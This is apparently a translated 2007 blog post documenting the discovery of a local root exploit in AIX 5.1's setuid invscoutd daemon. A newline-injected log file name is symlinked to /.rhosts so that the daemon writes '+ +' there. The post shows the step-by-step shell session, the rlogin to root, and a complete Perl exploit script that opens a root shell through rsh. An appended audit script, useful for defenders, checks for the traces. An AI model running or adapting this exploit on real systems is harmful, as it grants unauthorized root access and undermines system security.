Found a Virus? AIX Bug-Hunting Notes: invscoutd

Published: 2007-07-04

  Platform information:
  -bash-2.05b$ oslevel
  5.1.0.0
  -bash-2.05b$ oslevel -r
  5100-01
  
  Going by my horoscope, today it is the invscoutd command's turn to be examined.
  -bash-2.05b$ ls -l /usr/sbin/invscoutd
  -r-sr-xr-x 1 root system 217868 Aug 03 2001 /usr/sbin/invscoutd
  
  -bash-2.05b$ man invscoutd
  …………
  The invscoutd command implements a permanent Inventory Scout server daemon on
  one machine in a user's local network. The usual client is a Java applet running
  in the user's Web browser, which was downloaded from a central Inventory Scout
  CGI application.
  …………
  
  Now let's see what this command looks like:
  -bash-2.05b$ invscoutd
  invscoutd: Missing log file name.
  Inventory Scout Daemon 2.0.2. @@@ CAT VERSION @@@
  USAGE: invscoutd [options] logfile <-- so it writes a log file.
  logfile Append status and err msgs. '-' means write to stderr.
  -o Overwrite preexisting log file instead of append. <-- and it can overwrite an existing file
  -pN Change port number to N from default 808. <-- listens on port 808 by default
  -bN Change read buffer size to N from default 1024.
  -dN Change max logic db file size to N from default 50000.
  -tN Change timeout period to N seconds from default 30 seconds.
  -vN Change verbosity level to N from default 18, <-- verbosity levels; the higher the level, the more detail should be logged
  25=max 20=debug 18=calls 15=banner 10=errs 5=fatal 0=none.
  
  I vaguely recall that quite a few old Unix vulnerabilities involved incorrect handling of log file permissions, so let's examine its log file first.
  
  
  -bash-2.05b$ ls -l /tmp/bb
  ls: 0653-341 The file /tmp/bb does not exist.
  
  -bash-2.05b$ invscoutd /tmp/bb
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17028
  flog=/tmp/bb
  -bash-2.05b$ ls -l /tmp/bb
  -rw-r--r-- 1 root staff 270 May 03 03:54 /tmp/bb
  
  Whoa~~, the permissions really are wrong!! The log file is owned by root!!
  
  -bash-2.05b$ id
  uid=203(cloud) gid=1(staff)
  
  So it really is a vulnerability. What can I do with it??
  Let me think......

  At the very least it could clobber important system configuration files, haha......

  Thinking further: for an important file that does not yet exist, such as /.rhosts (honestly the only one I can think of right now), we could use this bug to create it, and if we ran umask 000 beforehand
  the created file would be writable by us ^_^

  Then we could write whatever we wanted into it, e.g. add to /.rhosts the line
  + +

  Unfortunately the r-services (rlogin, rsh) check the file attributes when they consult .rhosts:
  if the file is not owned by the corresponding user, or if its permissions grant write access to group or others, authentication fails!

  So creating a /.rhosts that we can write to is not going to get us root~~

  And overwriting an important file such as /etc/passwd does not change its permissions~~

  Thinking it over once more: what we really want is to control what gets written into the file. If we cannot get write permission on the file directly, we go at it indirectly: if we can control what the daemon writes into its log file, we could still modify /.rhosts, /etc/passwd, /var/spool/cron/crontabs/root and the like and make ourselves root, couldn't we?
  
  Let's quickly look at what was written to the log file:
  -bash-2.05b$ cat /tmp/bb
  2003/05/03 03:54:37 G16716:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 03:54:37 G16716:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 03:54:37 P17028:invscoutd_2.0.2 Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17028
  flog=/tmp/bb
  
  Only the flog=/tmp/bb part seems to depend on our input.

  Let's try again and see whether the problem can be reproduced.
  
  -bash-2.05b$ invscoutd ./aa
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Exit code 2, pid 536968056.
  
  Looks like the old process has to be killed before trying again.
  
  -bash-2.05b$ ps -ef |grep invs
  cloud 15526 1 0 04:36:25 pts/0 0:00 invscoutd ./aa
  cloud 16068 16836 1 04:37:50 pts/0 0:00 grep invs
  -bash-2.05b$ kill -9 15526
  
  Did the error just now get recorded in the log file?
  -bash-2.05b$ ls -l ./aa
  ls: 0653-341 The file ./aa does not exist.
  
  It did not.


  Let me try once more; I won't be satisfied until I've reproduced it.
  -bash-2.05b$ invscoutd ./aa
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=15526
  flog=./aa
  
  -bash-2.05b$ ls -l ./aa
  ls: 0653-341 The file ./aa does not exist.
  Hm, why wasn't it logged? Does the file name have to start with /? Never mind for now, let's write under /tmp and try again.

  This time I've learned my lesson: kill the process first.
  -bash-2.05b$ ps -ef |grep invsc
  cloud 14194 15338 3 03:55:29 pts/0 0:00 grep invsc
  cloud 17028 1 0 03:54:37 pts/0 0:00 invscoutd ./aa
  -bash-2.05b$ kill -9 17028
  
  …………
  
  Testing confirms it reproduces. Good~~

  Thinking about it: to get root by rewriting .rhosts, passwd or a crontab, we must be able to control one complete line written to the file. In the log, the part we control is the file name after flog=, so a file name containing newline characters would let us control a whole line, e.g. a name of the form aaaa\n<complete line>\naaaa.

  I couldn't immediately recall how to enter a \n character at the shell and pass it as a single command-line argument, but the Perl I learned earlier came in handy ^_* Use Perl to run the system command invscoutd "/tmp/bbbbb\n+ +\nddd" and see whether it produces a separate log line containing just + +
  
  -bash-2.05b$ perl -e 'system invscoutd,"/tmp/bbbbb\n+ +\nddd";'
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=16282
  flog=/tmp/bbbbb
  + +
  ddd
  -bash-2.05b$ cat /tmp/bbbbb*
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Bind error, port 808: The socket name is already in use..
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Exit code 2, pid 536968072.
  2003/05/03 03:59:27 G14934:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 03:59:27 G14934:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 03:59:27 P16282:invscoutd_2.0.2 Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=16282
  flog=/tmp/bbbbb
  + +
  ddd
  
  Heh, it works!!
  
  -bash-2.05b$ ls -l /tmp/bbbbb*
  -rw-r--r-- 1 root staff 602 May 03 03:59 /tmp/bbbbb
  + +
  ddd
  
  So how do we get "\n+ +\n" written into /.rhosts?


  Think......

  Think again......

  Heh, I've got it. Have you?

  I'll give you five more minutes; think hard~~

  Running invscoutd /.rhosts directly
  certainly won't do; the file would not contain the
  + +
  line we want.

  If we run perl -e 'system invscoutd,"/tmp/bbbbb\n+ +\nddd";'
  writing
  + +
  into the log file succeeds,

  but the file written is "/tmp/bbbbb\n+ +\nddd", whereas what we want is to write to /.rhosts. Think some more......

  To sum up, the core of the problem is getting file name A written into file B, and the Unix symbolic link looks like exactly that bridge~

  We just create a symbolic link A -> B!
  ln -s B A
  then
  invscoutd A
  and it should work.

  Let's go:
  
  -bash-2.05b$ ls -l /.rhosts
  ls: 0653-341 The file /.rhosts does not exist.
  
  Create the A -> B symbolic link:
  -bash-2.05b$ perl -e 'symlink "/.rhosts","/tmp/cc\n+ +\ndd";'
  Here B is "/.rhosts"
  and A is "/tmp/cc\n+ +\ndd"
  
  -bash-2.05b$ ls -l /tmp/cc*
  lrwxrwxrwx 1 cloud staff 8 May 03 04:02 /tmp/cc
  + +
  dd -> /.rhosts
  
  Now run it
  
  -bash-2.05b$ perl -e 'system invscoutd,"/tmp/cc\n+ +\ndd";'
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Exit code 2, pid 536968072.
  -bash-2.05b$ ps -ef |grep invsc
  cloud 16282 1 0 03:59:27 - 0:00 invscoutd /tmp/bbbbb?+ +?ddd
  cloud 17146 15338 1 04:03:40 pts/0 0:00 grep invsc
  -bash-2.05b$ kill -9 16282
  -bash-2.05b$ perl -e 'system invscoutd,"/tmp/cc\n+ +\ndd";'
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17150
  flog=/tmp/cc
  + +
  dd
  
  Check whether the file was created:
  -bash-2.05b$ ls -l /.rhosts
  -rw-r--r-- 1 root staff 598 May 03 04:03 /.rhosts
  
  OK, now let's look at the contents:
  
  -bash-2.05b$ cat /.rhosts
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Bind error, port 808: The socket name is already in use..
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Exit code 2, pid 536968072.
  2003/05/03 04:03:48 G14270:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 04:03:48 G14270:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 04:03:48 P17150:invscoutd_2.0.2 Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17150
  flog=/tmp/cc
  + +
  dd
  
  
  Heh, + + got written in!!!

  Now rlogin to localhost as root, which should give us root privileges:
  
  -bash-2.05b$ rlogin -l root localhost
  usage: rlogin host [ -ex ] [ -l username ] [-f|-F] [-k realm] [ -8 ]
  
  Faint! I got so excited I forgot the command syntax.

  Again:
  
  -bash-2.05b$ rlogin localhost -l root
  *******************************************************************************
  * *
  * *
  * Welcome to AIX Version 5.1! *
  * *
  * *
  * Please see the README file in /usr/lpp/bos for information pertinent to *
  * this release of the AIX Operating System. *
  * *
  * *
  *******************************************************************************
  …………
  
  -bash-2.05b# <-- the sweet privileged "#" prompt!
  -bash-2.05b# id
  uid=0(root) gid=0(system) groups=2(bin),3(sys),7(security),8(cron),10(audit),11(lp)
  
  
  Hahaha~~ done~~ this little sparrow has turned into root~~
  All those years of studying Unix weren't wasted after all~~
  Tears welling up......

  Still moved......

  @!#@%¥#%, still basking in it~~!!!

  OK, OK, narcissist! Back to work~~

  A quick cleanup~
  -bash-2.05b# rm /.rhosts
  -bash-2.05b# rm /tmp/bb* /tmp/cc*
  -bash-2.05b# ps -ef |grep invsc
  cloud 14306 15338 1 04:05:51 pts/0 0:00 grep invsc
  cloud 17150 1 0 04:03:48 - 0:00 invscoutd /tmp/cc?+ +?dd
  -bash-2.05b# kill -9 17150
  -bash-2.05b#
  
  Scripted version:
  #!/usr/bin/perl
  # Log file name with embedded newlines; the middle line is what lands in /.rhosts.
  $LOG="/tmp/.ex/.hello\n+ +\nworld";
  $CMD="/usr/sbin/invscoutd";
  umask 022;
  mkdir "/tmp/.ex",0777;

  # Any running instance must be killed first, or the new one exits with a bind error.
  # (The original wrote "print ..., exit 1 if ...", which exits before printing.)
  if (&killproc() == 0) {
      print "Exploit error on kill process invscoutd !!\n";
      exit 1;
  }

  # Point the log file name at /.rhosts and let the daemon create it.
  symlink "/.rhosts",$LOG;
  system $CMD,"-p7321",$LOG; &killproc();
  unlink $LOG;
  print "\n============\nRemember to remove /.rhosts !!\n";
  print "rsh localhost -l root '/bin/sh -i'\n";
  print "waiting . . . . . .\n";
  system "rsh","localhost","-l","root","/bin/sh -i";

  # Put a daemon back on the default port, logging to /dev/null, then clean up.
  system $CMD,"-p808","/dev/null" ; &killproc();
  rmdir "/tmp/.ex";

  # Kill the first invscoutd process found: returns -1 if none, 0 if the kill failed.
  sub killproc {
      my $ret;
      $_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
      @proc_lst=split;
      $ret=kill 9,$proc_lst[1] if $proc_lst[1];
      $ret=-1 if ! defined $ret;
      return $ret;
  }
  #EOF
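Everything above leaves traces an administrator can look for: a root-owned log dropped in /tmp, a symlink whose name embeds newlines and whose target is /.rhosts, a wildcard "+ +" entry in /.rhosts, and a set-uid daemon. The audit script below is an added example, not part of the original post or of AIX; it assumes a POSIX sh with find, readlink and grep, and the files its demo checks are constructed in a temporary directory.

```shell
#!/bin/sh
# Added audit script, not from the original post. It looks for the traces the
# technique above leaves behind. Assumes POSIX sh plus find, readlink and grep.

# Privileged files a root-owned log writer must never be pointed at.
SENSITIVE='/.rhosts /etc/passwd /etc/shadow /var/spool/cron/crontabs/root'

# audit_symlinks DIR: print one line per suspicious symlink under DIR, i.e. a
# link whose target is in SENSITIVE or whose own name embeds a newline (the
# "flog=" line-splitting trick). Newlines in names are shown as '?', as ps did.
audit_symlinks() {
    find "$1" -type l -exec sh -c '
        sensitive=$1; shift
        nl="
"
        for link; do
            target=$(readlink "$link") || continue
            shown=$(printf "%s" "$link" | tr "\n" "?")
            case " $sensitive " in
                *" $target "*) printf "symlink to privileged file: %s -> %s\n" "$shown" "$target" ;;
            esac
            case $link in
                *"$nl"*) printf "newline in file name: %s\n" "$shown" ;;
            esac
        done' sh "$SENSITIVE" {} +
}

# rhosts_has_wildcard FILE: succeed when FILE holds a "+" or "+ +" entry,
# which makes the r-services trust every host (and, with "+ +", every user).
rhosts_has_wildcard() {
    grep -q -E '^[[:space:]]*\+([[:space:]]+\+)?[[:space:]]*$' "$1"
}

# setuid_daemon PATH: succeed when PATH carries the set-uid bit, like invscoutd.
setuid_daemon() { [ -u "$1" ]; }
# Self-contained demo on constructed files; nothing outside a temp dir is touched.
demo() {
    tmp=$(mktemp -d) || return 1
    evil=$(printf '%s\n+ +\ndd' "$tmp/cc")      # same shape as the link above
    ln -s /.rhosts "$evil"
    ln -s /etc/passwd "$tmp/pw"                 # privileged target, plain name
    ln -s /etc/hosts "$tmp/ok"                  # harmless, must not be reported
    printf '2003/05/03 04:03:48 flog=/tmp/cc\n+ +\ndd\n' > "$tmp/rhosts"
    audit_symlinks "$tmp"
    rhosts_has_wildcard "$tmp/rhosts" && echo "$tmp/rhosts: wildcard entry"
    setuid_daemon /usr/sbin/invscoutd && echo "/usr/sbin/invscoutd is set-uid"
    rm -rf "$tmp"
}
demo
```

On a real host, run audit_symlinks against /tmp and any other world-writable directory and rhosts_has_wildcard against /.rhosts and each home directory's .rhosts.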

Original source: http://www.ltesting.net